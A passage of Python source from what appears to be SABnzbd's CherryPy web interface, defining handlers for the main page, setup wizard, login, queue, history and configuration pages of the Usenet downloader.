info['preload_history'] = 'false'
template = Template(file=os.path.join(sabnzbd.WEB_DIR, 'main.tmpl'),
filter=FILTER, searchList=[info], compilerSettings=DIRECTIVES)
return template.respond()
else:
# Redirect to the setup wizard
raise cherrypy.HTTPRedirect('%s/wizard/' % cfg.url_base())
@secured_expose(check_session_key=True)
def addFile(self, **kwargs):
nzbfile = kwargs.get('nzbfile')
if nzbfile is not None and nzbfile.filename:
if nzbfile.value or nzbfile.file:
sabnzbd.add_nzbfile(nzbfile, kwargs.get('pp'), kwargs.get('script'),
kwargs.get('cat'), kwargs.get('priority', NORMAL_PRIORITY))
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def shutdown(self, **kwargs):
# Check for PID
pid_in = kwargs.get('pid')
if pid_in and int(pid_in) != os.getpid():
return "Incorrect PID for this instance, remove PID from URL to initiate shutdown."
sabnzbd.shutdown_program()
return T('SABnzbd shutdown finished')
@secured_expose(check_session_key=True)
def pause(self, **kwargs):
scheduler.plan_resume(0)
Downloader.do.pause()
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def resume(self, **kwargs):
scheduler.plan_resume(0)
sabnzbd.unpause_all()
raise Raiser(self.__root)
@cherrypy.expose
def tapi(self, **kwargs):
""" Handler for API over http, for template use """
msg = check_apikey(kwargs)
if msg:
return msg
return api_handler(kwargs)
@cherrypy.expose
def api(self, **kwargs):
""" Handler for API over http, with explicit authentication parameters """
if cfg.api_logging():
# Was it proxy forwarded?
xff = cherrypy.request.headers.get('X-Forwarded-For')
if xff:
logging.debug('API-call from %s (X-Forwarded-For: %s) [%s] %s', cherrypy.request.remote.ip,
xff, cherrypy.request.headers.get('User-Agent', '??'), kwargs)
else:
logging.debug('API-call from %s [%s] %s', cherrypy.request.remote.ip,
cherrypy.request.headers.get('User-Agent', '??'), kwargs)
mode = kwargs.get('mode', '')
if isinstance(mode, list):
mode = mode[0]
kwargs['mode'] = mode
name = kwargs.get('name', '')
if isinstance(name, list):
name = name[0]
kwargs['name'] = name
if mode not in ('version', 'auth'):
msg = check_apikey(kwargs)
if msg:
return msg
return api_handler(kwargs)
@secured_expose
def scriptlog(self, **kwargs):
""" Duplicate of scriptlog of History, needed for some skins """
# No session key check, due to fixed URLs
name = kwargs.get('name')
if name:
history_db = sabnzbd.get_db_connection()
return ShowString(history_db.get_name(name), history_db.get_script_log(name))
else:
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def retry(self, **kwargs):
""" Duplicate of retry of History, needed for some skins """
job = kwargs.get('job', '')
url = kwargs.get('url', '').strip()
pp = kwargs.get('pp')
cat = kwargs.get('cat')
script = kwargs.get('script')
if url:
sabnzbd.add_url(url, pp, script, cat, nzbname=kwargs.get('nzbname'))
del_hist_job(job, del_files=True)
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def retry_pp(self, **kwargs):
# Duplicate of History/retry_pp to please the SMPL skin :(
retry_job(kwargs.get('job'), kwargs.get('nzbfile'), kwargs.get('password'))
raise Raiser(self.__root)
@secured_expose
def robots_txt(self, **kwargs):
""" Keep web crawlers out """
cherrypy.response.headers['Content-Type'] = 'text/plain'
return 'User-agent: *\nDisallow: /\n'
##############################################################################
class Wizard(object):
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
""" Show the language selection page """
if sabnzbd.WIN32:
import util.apireg
cfg.language.set(util.apireg.get_install_lng())
logging.debug('Installer language code "%s"', cfg.language())
info = build_header(sabnzbd.WIZARD_DIR)
info['languages'] = list_languages()
template = Template(file=os.path.join(sabnzbd.WIZARD_DIR, 'index.html'),
searchList=[info], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_configlock=True)
def one(self, **kwargs):
""" Accept language and show server page """
if kwargs.get('lang'):
cfg.language.set(kwargs.get('lang'))
# Always setup Glitter
change_web_dir('Glitter - Default')
info = build_header(sabnzbd.WIZARD_DIR)
info['have_ssl_context'] = sabnzbd.HAVE_SSL_CONTEXT
# Just in case, add server
servers = config.get_servers()
if not servers:
info['host'] = ''
info['port'] = ''
info['username'] = ''
info['password'] = ''
info['connections'] = ''
info['ssl'] = 0
info['ssl_verify'] = 2
else:
# Sort servers to get the first enabled one
server_names = sorted(servers.keys(), key=lambda svr: '%d%02d%s' % (int(not servers[svr].enable()), servers[svr].priority(), servers[svr].displayname().lower()))
for server in server_names:
# If there are multiple servers, just use the first enabled one
s = servers[server]
info['host'] = s.host()
info['port'] = s.port()
info['username'] = s.username()
info['password'] = s.password.get_stars()
info['connections'] = s.connections()
info['ssl'] = s.ssl()
info['ssl_verify'] = s.ssl_verify()
if s.enable():
break
template = Template(file=os.path.join(sabnzbd.WIZARD_DIR, 'one.html'),
searchList=[info], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_configlock=True)
def two(self, **kwargs):
""" Accept server and show the final page for restart """
# Save server details
if kwargs:
kwargs['enable'] = 1
handle_server(kwargs)
config.save_config()
# Show Restart screen
info = build_header(sabnzbd.WIZARD_DIR)
info['access_url'], info['urls'] = get_access_info()
info['download_dir'] = cfg.download_dir.get_path()
info['complete_dir'] = cfg.complete_dir.get_path()
template = Template(file=os.path.join(sabnzbd.WIZARD_DIR, 'two.html'),
searchList=[info], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose
def exit(self, **kwargs):
""" Stop SABnzbd """
sabnzbd.shutdown_program()
return T('SABnzbd shutdown finished')
def get_access_info():
""" Build up a list of url's that sabnzbd can be accessed from """
# Access_url is used to provide the user a link to sabnzbd depending on the host
access_uri = 'localhost'
cherryhost = cfg.cherryhost()
if cherryhost == '0.0.0.0':
host = socket.gethostname()
socks = [host]
# Grab a list of all ips for the hostname
try:
addresses = socket.getaddrinfo(host, None)
except:
addresses = []
for addr in addresses:
address = addr[4][0]
# Filter out ipv6 addresses (should not be allowed)
if ':' not in address and address not in socks:
socks.append(address)
if "host" in cherrypy.request.headers:
host = cherrypy.request.headers['host']
host = host.rsplit(':')[0]
access_uri = host
socks.insert(0, host)
else:
socks.insert(0, 'localhost')
elif cherryhost == '::':
host = socket.gethostname()
socks = [host]
# Grab a list of all ips for the hostname
addresses = socket.getaddrinfo(host, None)
for addr in addresses:
address = addr[4][0]
# Only ipv6 addresses will work
if ':' in address:
address = '[%s]' % address
if address not in socks:
socks.append(address)
if "host" in cherrypy.request.headers:
host = cherrypy.request.headers['host']
host = host.rsplit(':')[0]
access_uri = host
socks.insert(0, host)
else:
socks.insert(0, 'localhost')
elif not cherryhost:
socks = [socket.gethostname()]
access_uri = socket.gethostname()
else:
socks = [cherryhost]
access_uri = cherryhost
urls = []
for sock in socks:
if sock:
if cfg.enable_https() and cfg.https_port():
url = 'https://%s:%s%s' % (sock, cfg.https_port(), cfg.url_base())
elif cfg.enable_https():
url = 'https://%s:%s%s' % (sock, cfg.cherryport(), cfg.url_base())
else:
url = 'http://%s:%s%s' % (sock, cfg.cherryport(), cfg.url_base())
urls.append(url)
if cfg.enable_https() and cfg.https_port():
access_url = 'https://%s:%s%s' % (sock, cfg.https_port(), cfg.url_base())
elif cfg.enable_https():
access_url = 'https://%s:%s%s' % (access_uri, cfg.cherryport(), cfg.url_base())
else:
access_url = 'http://%s:%s%s' % (access_uri, cfg.cherryport(), cfg.url_base())
return access_url, urls
##############################################################################
class LoginPage(object):
@cherrypy.expose
def index(self, **kwargs):
# Base output var
info = build_header(sabnzbd.WEB_DIR_CONFIG)
info['error'] = ''
# Logout?
if kwargs.get('logout'):
set_login_cookie(remove=True)
raise Raiser()
# Check if there's even a username/password set
if check_login():
raise Raiser(cherrypy.request.script_name + '/')
# Was it proxy forwarded?
xff = cherrypy.request.headers.get('X-Forwarded-For')
# Check login info
if kwargs.get('username') == cfg.username() and kwargs.get('password') == cfg.password():
# Save login cookie
set_login_cookie(remember_me=kwargs.get('remember_me', False))
# Log the success
if xff:
logging.info('Successful login from %s (X-Forwarded-For: %s)', cherrypy.request.remote.ip, xff)
else:
logging.info('Successful login from %s', cherrypy.request.remote.ip)
# Redirect
raise Raiser(cherrypy.request.script_name + '/')
elif kwargs.get('username') or kwargs.get('password'):
info['error'] = T('Authentication failed, check username/password.')
# Warn about the potential security problem
fail_msg = T('Unsuccessful login attempt from %s') % cherrypy.request.remote.ip
if xff:
fail_msg = '%s (X-Forwarded-For: %s)' % (fail_msg, xff)
logging.warning(fail_msg)
# Show login
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'login', 'main.tmpl'),
filter=FILTER, searchList=[info], compilerSettings=DIRECTIVES)
return template.respond()
##############################################################################
class NzoPage(object):
def __init__(self, root):
self.__root = root
self.__cached_selection = {} # None
@secured_expose
def default(self, *args, **kwargs):
# Allowed URL's
# /nzb/SABnzbd_nzo_xxxxx/
# /nzb/SABnzbd_nzo_xxxxx/details
# /nzb/SABnzbd_nzo_xxxxx/files
# /nzb/SABnzbd_nzo_xxxxx/bulk_operation
# /nzb/SABnzbd_nzo_xxxxx/save
nzo_id = None
for a in args:
if a.startswith('SABnzbd_nzo'):
nzo_id = a
break
nzo = NzbQueue.do.get_nzo(nzo_id)
if nzo_id and nzo:
info, pnfo_list, bytespersec, q_size, bytes_left_previous_page = build_queue_header()
# /SABnzbd_nzo_xxxxx/bulk_operation
if 'bulk_operation' in args:
return self.bulk_operation(nzo_id, kwargs)
# /SABnzbd_nzo_xxxxx/details
elif 'details' in args:
info = self.nzo_details(info, pnfo_list, nzo_id)
# /SABnzbd_nzo_xxxxx/files
elif 'files' in args:
info = self.nzo_files(info, nzo_id)
# /SABnzbd_nzo_xxxxx/save
elif 'save' in args:
self.save_details(nzo_id, args, kwargs)
return # never reached
# /SABnzbd_nzo_xxxxx/
else:
info = self.nzo_details(info, pnfo_list, nzo_id)
info = self.nzo_files(info, nzo_id)
template = Template(file=os.path.join(sabnzbd.WEB_DIR, 'nzo.tmpl'),
filter=FILTER, searchList=[info], compilerSettings=DIRECTIVES)
return template.respond()
else:
# Job no longer exists, go to main page
raise Raiser(cherrypy.lib.httputil.urljoin(self.__root, '../queue/'))
def nzo_details(self, info, pnfo_list, nzo_id):
slot = {}
n = 0
for pnfo in pnfo_list:
if pnfo.nzo_id == nzo_id:
nzo = NzbQueue.do.get_nzo(nzo_id)
repair = pnfo.repair
unpack = pnfo.unpack
delete = pnfo.delete
unpackopts = sabnzbd.opts_to_pp(repair, unpack, delete)
script = pnfo.script
if script is None:
script = 'None'
cat = pnfo.category
if not cat:
cat = 'None'
filename_pw = xml_name(nzo.final_name_pw_clean)
filename = xml_name(nzo.final_name)
if nzo.password:
password = xml_name(nzo.password).replace('"', '&quot;')
else:
password = ''
priority = pnfo.priority
slot['nzo_id'] = str(nzo_id)
slot['cat'] = cat
slot['filename'] = filename_pw
slot['filename_clean'] = filename
slot['password'] = password or ''
slot['script'] = script
slot['priority'] = str(priority)
slot['unpackopts'] = str(unpackopts)
info['index'] = n
break
n += 1
info['slot'] = slot
info['scripts'] = list_scripts()
info['categories'] = list_cats()
info['noofslots'] = len(pnfo_list)
return info
def nzo_files(self, info, nzo_id):
active = []
nzo = NzbQueue.do.get_nzo(nzo_id)
if nzo:
pnfo = nzo.gather_info(full=True)
info['nzo_id'] = pnfo.nzo_id
info['filename'] = xml_name(pnfo.filename)
for nzf in pnfo.active_files:
checked = False
if nzf.nzf_id in self.__cached_selection and \
self.__cached_selection[nzf.nzf_id] == 'on':
checked = True
active.append({'filename': xml_name(nzf.filename if nzf.filename else nzf.subject),
'mbleft': "%.2f" % (nzf.bytes_left / MEBI),
'mb': "%.2f" % (nzf.bytes / MEBI),
'size': format_bytes(nzf.bytes),
'sizeleft': format_bytes(nzf.bytes_left),
'nzf_id': nzf.nzf_id,
'age': calc_age(nzf.date),
'checked': checked})
info['active_files'] = active
return info
def save_details(self, nzo_id, args, kwargs):
index = kwargs.get('index', None)
name = kwargs.get('name', None)
password = kwargs.get('password', None)
if password == "":
password = None
pp = kwargs.get('pp', None)
script = kwargs.get('script', None)
cat = kwargs.get('cat', None)
priority = kwargs.get('priority', None)
nzo = NzbQueue.do.get_nzo(nzo_id)
if index is not None:
NzbQueue.do.switch(nzo_id, index)
if name is not None:
NzbQueue.do.change_name(nzo_id, special_fixer(name), password)
if cat is not None and nzo.cat != cat and not (nzo.cat == '*' and cat == 'Default'):
NzbQueue.do.change_cat(nzo_id, cat, priority)
# Category changed, so make sure "Default" attributes aren't set again
if script == 'Default':
script = None
if priority == 'Default':
priority = None
if pp == 'Default':
pp = None
if script is not None and nzo.script != script:
NzbQueue.do.change_script(nzo_id, script)
if pp is not None and nzo.pp != pp:
NzbQueue.do.change_opts(nzo_id, pp)
if priority is not None and nzo.priority != int(priority):
NzbQueue.do.set_priority(nzo_id, priority)
raise Raiser(cherrypy.lib.httputil.urljoin(self.__root, '../queue/'))
def bulk_operation(self, nzo_id, kwargs):
self.__cached_selection = kwargs
if kwargs['action_key'] == 'Delete':
for key in kwargs:
if kwargs[key] == 'on':
NzbQueue.do.remove_nzf(nzo_id, key, force_delete=True)
elif kwargs['action_key'] in ('Top', 'Up', 'Down', 'Bottom'):
nzf_ids = []
for key in kwargs:
if kwargs[key] == 'on':
nzf_ids.append(key)
size = int_conv(kwargs.get('action_size', 1))
if kwargs['action_key'] == 'Top':
NzbQueue.do.move_top_bulk(nzo_id, nzf_ids)
elif kwargs['action_key'] == 'Up':
NzbQueue.do.move_up_bulk(nzo_id, nzf_ids, size)
elif kwargs['action_key'] == 'Down':
NzbQueue.do.move_down_bulk(nzo_id, nzf_ids, size)
elif kwargs['action_key'] == 'Bottom':
NzbQueue.do.move_bottom_bulk(nzo_id, nzf_ids)
if NzbQueue.do.get_nzo(nzo_id):
url = cherrypy.lib.httputil.urljoin(self.__root, nzo_id)
else:
url = cherrypy.lib.httputil.urljoin(self.__root, '../queue')
if url and not url.endswith('/'):
url += '/'
raise Raiser(url)
##############################################################################
class QueuePage(object):
def __init__(self, root):
self.__root = root
@secured_expose
def index(self, **kwargs):
start = int_conv(kwargs.get('start'))
limit = int_conv(kwargs.get('limit'))
search = kwargs.get('search')
info, _pnfo_list, _bytespersec = build_queue(start=start, limit=limit, trans=True, search=search)
template = Template(file=os.path.join(sabnzbd.WEB_DIR, 'queue.tmpl'),
filter=FILTER, searchList=[info], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True)
def delete(self, **kwargs):
uid = kwargs.get('uid')
del_files = int_conv(kwargs.get('del_files'))
if uid:
NzbQueue.do.remove(uid, False, keep_basic=not del_files, del_files=del_files)
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def purge(self, **kwargs):
NzbQueue.do.remove_all(kwargs.get('search'))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def change_queue_complete_action(self, **kwargs):
""" Action or script to be performed once the queue has been completed
Scripts are prefixed with 'script_'
"""
action = kwargs.get('action')
sabnzbd.change_queue_complete_action(action)
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def switch(self, **kwargs):
uid1 = kwargs.get('uid1')
uid2 = kwargs.get('uid2')
if uid1 and uid2:
NzbQueue.do.switch(uid1, uid2)
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def change_opts(self, **kwargs):
nzo_id = kwargs.get('nzo_id')
pp = kwargs.get('pp', '')
if nzo_id and pp and pp.isdigit():
NzbQueue.do.change_opts(nzo_id, int(pp))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def change_script(self, **kwargs):
nzo_id = kwargs.get('nzo_id')
script = kwargs.get('script', '')
if nzo_id and script:
if script == 'None':
script = None
NzbQueue.do.change_script(nzo_id, script)
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def change_cat(self, **kwargs):
nzo_id = kwargs.get('nzo_id')
cat = kwargs.get('cat', '')
if nzo_id and cat:
if cat == 'None':
cat = None
NzbQueue.do.change_cat(nzo_id, cat)
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def shutdown(self, **kwargs):
sabnzbd.shutdown_program()
return T('SABnzbd shutdown finished')
@secured_expose(check_session_key=True)
def pause(self, **kwargs):
scheduler.plan_resume(0)
Downloader.do.pause()
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def resume(self, **kwargs):
scheduler.plan_resume(0)
sabnzbd.unpause_all()
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def pause_nzo(self, **kwargs):
uid = kwargs.get('uid', '')
NzbQueue.do.pause_multiple_nzo(uid.split(','))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def resume_nzo(self, **kwargs):
uid = kwargs.get('uid', '')
NzbQueue.do.resume_multiple_nzo(uid.split(','))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def set_priority(self, **kwargs):
NzbQueue.do.set_priority(kwargs.get('nzo_id'), kwargs.get('priority'))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def sort_by_avg_age(self, **kwargs):
NzbQueue.do.sort_queue('avg_age', kwargs.get('dir'))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def sort_by_name(self, **kwargs):
NzbQueue.do.sort_queue('name', kwargs.get('dir'))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def sort_by_size(self, **kwargs):
NzbQueue.do.sort_queue('size', kwargs.get('dir'))
raise queueRaiser(self.__root, kwargs)
##############################################################################
class HistoryPage(object):
def __init__(self, root):
self.__root = root
self.__verbose = False
self.__verbose_list = []
self.__failed_only = False
@secured_expose
def index(self, **kwargs):
start = int_conv(kwargs.get('start'))
limit = int_conv(kwargs.get('limit'))
search = kwargs.get('search')
failed_only = kwargs.get('failed_only')
if failed_only is None:
failed_only = self.__failed_only
history = build_header()
history['isverbose'] = self.__verbose
history['failed_only'] = failed_only
history['rating_enable'] = bool(cfg.rating_enable())
postfix = T('B') # : Abbreviation for bytes, as in GB
grand, month, week, day = BPSMeter.do.get_sums()
history['total_size'], history['month_size'], history['week_size'], history['day_size'] = \
to_units(grand, postfix=postfix), to_units(month, postfix=postfix), \
to_units(week, postfix=postfix), to_units(day, postfix=postfix)
history['lines'], history['fetched'], history['noofslots'] = build_history(limit=limit, start=start, verbose=self.__verbose, verbose_list=self.__verbose_list, search=search, failed_only=failed_only)
if search:
history['search'] = escape(search)
else:
history['search'] = ''
history['start'] = int_conv(start)
history['limit'] = int_conv(limit)
history['finish'] = history['start'] + history['limit']
if history['finish'] > history['noofslots']:
history['finish'] = history['noofslots']
if not history['finish']:
history['finish'] = history['fetched']
history['time_format'] = time_format
template = Template(file=os.path.join(sabnzbd.WEB_DIR, 'history.tmpl'),
filter=FILTER, searchList=[history], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True)
def purge(self, **kwargs):
history_db = sabnzbd.get_db_connection()
history_db.remove_history()
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def delete(self, **kwargs):
job = kwargs.get('job')
del_files = int_conv(kwargs.get('del_files'))
if job:
jobs = job.split(',')
for job in jobs:
del_hist_job(job, del_files=del_files)
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def retry_pp(self, **kwargs):
retry_job(kwargs.get('job'), kwargs.get('nzbfile'), kwargs.get('password'))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def retry_all(self, **kwargs):
retry_all_jobs()
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def purge_failed(self, **kwargs):
del_files = bool(int_conv(kwargs.get('del_files')))
history_db = sabnzbd.get_db_connection()
if del_files:
del_job_files(history_db.get_failed_paths())
history_db.remove_failed()
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def reset(self, **kwargs):
# sabnzbd.reset_byte_counter()
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def tog_verbose(self, **kwargs):
jobs = kwargs.get('jobs')
if not jobs:
self.__verbose = not self.__verbose
self.__verbose_list = []
else:
if self.__verbose:
self.__verbose = False
else:
jobs = jobs.split(',')
for job in jobs:
if job in self.__verbose_list:
self.__verbose_list.remove(job)
else:
self.__verbose_list.append(job)
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def tog_failed_only(self, **kwargs):
self.__failed_only = not self.__failed_only
raise queueRaiser(self.__root, kwargs)
@secured_expose
def scriptlog(self, **kwargs):
""" Duplicate of scriptlog of History, needed for some skins """
# No session key check, due to fixed URLs
name = kwargs.get('name')
if name:
history_db = sabnzbd.get_db_connection()
return ShowString(history_db.get_name(name), history_db.get_script_log(name))
else:
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def retry(self, **kwargs):
job = kwargs.get('job', '')
url = kwargs.get('url', '').strip()
pp = kwargs.get('pp')
cat = kwargs.get('cat')
script = kwargs.get('script')
if url:
sabnzbd.add_url(url, pp, script, cat, nzbname=kwargs.get('nzbname'))
del_hist_job(job, del_files=True)
raise Raiser(self.__root)
##############################################################################
class ConfigPage(object):
def __init__(self, root):
self.__root = root
self.folders = ConfigFolders('/config/folders/')
self.notify = ConfigNotify('/config/notify/')
self.general = ConfigGeneral('/config/general/')
self.rss = ConfigRss('/config/rss/')
self.scheduling = ConfigScheduling('/config/scheduling/')
self.server = ConfigServer('/config/server/')
self.switches = ConfigSwitches('/config/switches/')
self.categories = ConfigCats('/config/categories/')
self.sorting = ConfigSorting('/config/sorting/')
self.special = ConfigSpecial('/config/special/')
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['configfn'] = config.get_filename()
conf['cmdline'] = sabnzbd.CMDLINE
conf['build'] = sabnzbd.version.__baseline__[:7]
conf['have_unzip'] = bool(sabnzbd.newsunpack.ZIP_COMMAND)
conf['have_7zip'] = bool(sabnzbd.newsunpack.SEVEN_COMMAND)
conf['have_cryptography'] = bool(sabnzbd.HAVE_CRYPTOGRAPHY)
conf['have_yenc'] = HAVE_YENC
conf['have_sabyenc'] = SABYENC_ENABLED
conf['have_mt_par2'] = sabnzbd.newsunpack.PAR2_MT
conf['have_ssl_context'] = sabnzbd.HAVE_SSL_CONTEXT
conf['ssl_version'] = ssl.OPENSSL_VERSION
new = {}
for svr in config.get_servers():
new[svr] = {}
conf['servers'] = new
conf['folders'] = NzbQueue.do.scan_jobs(all=False, action=False)
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config.tmpl'),
filter=FILTER, searchList=[conf], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True)
def restart(self, **kwargs):
logging.info('Restart requested by interface')
# Do the shutdown async to still send goodbye to browser
Thread(target=sabnzbd.trigger_restart, kwargs={'timeout': 1}).start()
return T(' <br />SABnzbd shutdown finished.<br />Wait about 5 seconds and then click the button below.<br /><br /><strong><a href="..">Refresh</a></strong><br />')
@secured_expose(check_session_key=True)
def repair(self, **kwargs):
logging.info('Queue repair requested by interface')
sabnzbd.request_repair()
# Do the shutdown async to still send goodbye to browser
Thread(target=sabnzbd.trigger_restart, kwargs={'timeout': 1}).start()
return T(' <br />SABnzbd shutdown finished.<br />Wait about 5 seconds and then click the button below.<br /><br /><strong><a href="..">Refresh</a></strong><br />')
##############################################################################
LIST_DIRPAGE = (
'download_dir', 'download_free', 'complete_dir', 'admin_dir',
'nzb_backup_dir', 'dirscan_dir', 'dirscan_speed', 'script_dir',
'email_dir', 'permissions', 'log_dir', 'password_file'
)
class ConfigFolders(object):
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
for kw in LIST_DIRPAGE:
conf[kw] = config.get_config('misc', kw)()
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_folders.tmpl'),
filter=FILTER, searchList=[conf], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def saveDirectories(self, **kwargs):
for kw in LIST_DIRPAGE:
value = kwargs.get(kw)
if value is not None:
value = platform_encode(value)
if kw in ('complete_dir', 'dirscan_dir'):
msg = config.get_config('misc', kw).set(value, create=True)
else:
msg = config.get_config('misc', kw).set(value)
if msg:
# return sabnzbd.api.report('json', error=msg)
return badParameterResponse(msg, kwargs.get('ajax'))
sabnzbd.check_incomplete_vs_complete()
config.save_config()
if kwargs.get('ajax'):
return sabnzbd.api.report('json')
else:
raise Raiser(self.__root)
##############################################################################
SWITCH_LIST = \
('par_option', 'top_only', 'direct_unpack', 'enable_meta', 'win_process_prio',
'auto_sort', 'propagation_delay', 'auto_disconnect', 'flat_unpack',
'safe_postproc', 'no_dupes', 'replace_spaces', 'replace_dots',
'ignore_samples', 'pause_on_post_processing', 'nice', 'ionice',
'pre_script', 'pause_on_pwrar', 'sfv_check', 'folder_rename', 'load_balancing',
'quota_size', 'quota_day', 'quota_resume', 'quota_period', 'history_retention',
'pre_check', 'max_art_tries', 'fail_hopeless_jobs', 'enable_all_par',
'enable_recursive', 'no_series_dupes', 'series_propercheck', 'script_can_fail',
'new_nzb_on_failure', 'unwanted_extensions', 'action_on_unwanted_extensions', 'sanitize_safe',
'rating_enable', 'rating_api_key', 'rating_filter_enable',
'rating_filter_abort_audio', 'rating_filter_abort_video', 'rating_filter_abort_encrypted',
'rating_filter_abort_encrypted_confirm', 'rating_filter_abort_spam', 'rating_filter_abort_spam_confirm',
'rating_filter_abort_downvoted', 'rating_filter_abort_keywords',
'rating_filter_pause_audio', 'rating_filter_pause_video', 'rating_filter_pause_encrypted',
'rating_filter_pause_encrypted_confirm', 'rating_filter_pause_spam', 'rating_filter_pause_spam_confirm',
'rating_filter_pause_downvoted', 'rating_filter_pause_keywords'
)
class ConfigSwitches(object):
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['have_ssl_context'] = sabnzbd.HAVE_SSL_CONTEXT
conf['have_nice'] = bool(sabnzbd.newsunpack.NICE_COMMAND)
conf['have_ionice'] = bool(sabnzbd.newsunpack.IONICE_COMMAND)
conf['cleanup_list'] = cfg.cleanup_list.get_string()
for kw in SWITCH_LIST:
conf[kw] = config.get_config('misc', kw)()
conf['unwanted_extensions'] = cfg.unwanted_extensions.get_string()
conf['scripts'] = list_scripts() or ['None']
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_switches.tmpl'),
filter=FILTER, searchList=[conf], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def saveSwitches(self, **kwargs):
for kw in SWITCH_LIST:
item = config.get_config('misc', kw)
value = platform_encode(kwargs.get(kw))
if kw == 'unwanted_extensions' and value:
value = value.lower().replace('.', '')
msg = item.set(value)
if msg:
return badParameterResponse(msg)
cleanup_list = kwargs.get('cleanup_list')
if cleanup_list and sabnzbd.WIN32:
cleanup_list = cleanup_list.lower()
cfg.cleanup_list.set(cleanup_list)
config.save_config()
raise Raiser(self.__root)
##############################################################################
SPECIAL_BOOL_LIST = \
('start_paused', 'no_penalties', 'fast_fail', 'ignore_wrong_unrar', 'overwrite_files', 'enable_par_cleanup',
'queue_complete_pers', 'api_warnings', 'ampm', 'enable_unrar', 'enable_unzip', 'enable_7zip',
'enable_filejoin', 'enable_tsjoin', 'ignore_unrar_dates', 'debug_log_decoding',
'multipar', 'osx_menu', 'osx_speed', 'win_menu', 'use_pickle', 'allow_incomplete_nzb',
'rss_filenames', 'ipv6_hosting', 'keep_awake', 'empty_postproc', 'html_login', 'wait_for_dfolder',
'max_art_opt', 'warn_empty_nzb', 'enable_bonjour', 'reject_duplicate_files', 'warn_dupl_jobs',
'replace_illegal', 'backup_for_duplicates', 'disable_api_key', 'api_logging',
'ignore_empty_files', 'x_frame_options', 'require_modern_tls'
)
SPECIAL_VALUE_LIST = \
('size_limit', 'folder_max_length', 'fsys_type', 'movie_rename_limit', 'nomedia_marker',
'max_url_retries', 'req_completion_rate', 'wait_ext_drive', 'show_sysload', 'url_base',
'direct_unpack_threads', 'ipv6_servers', 'selftest_host', 'rating_host'
)
SPECIAL_LIST_LIST = ('rss_odd_titles', 'quick_check_ext_ignore', 'host_whitelist')
class ConfigSpecial(object):
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['switches'] = [(kw, config.get_config('misc', kw)(), config.get_config('misc', kw).default()) for kw in SPECIAL_BOOL_LIST]
conf['entries'] = [(kw, config.get_config('misc', kw)(), config.get_config('misc', kw).default()) for kw in SPECIAL_VALUE_LIST]
conf['entries'].extend([(kw, config.get_config('misc', kw).get_string(), config.get_config('misc', kw).default_string()) for kw in SPECIAL_LIST_LIST])
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_special.tmpl'),
filter=FILTER, searchList=[conf], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def saveSpecial(self, **kwargs):
for kw in SPECIAL_BOOL_LIST + SPECIAL_VALUE_LIST + SPECIAL_LIST_LIST:
item = config.get_config('misc', kw)
value = kwargs.get(kw)
msg = item.set(value)
if msg:
return badParameterResponse(msg)
config.save_config()
raise Raiser(self.__root)
##############################################################################
GENERAL_LIST = (
'host', 'port', 'username', 'refresh_rate', 'language', 'cache_limit',
'local_ranges', 'inet_exposure', 'enable_https', 'https_port',
'https_cert', 'https_key', 'https_chain', 'enable_https_verification',
'auto_browser', 'check_new_rel'
)
class ConfigGeneral(object):
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
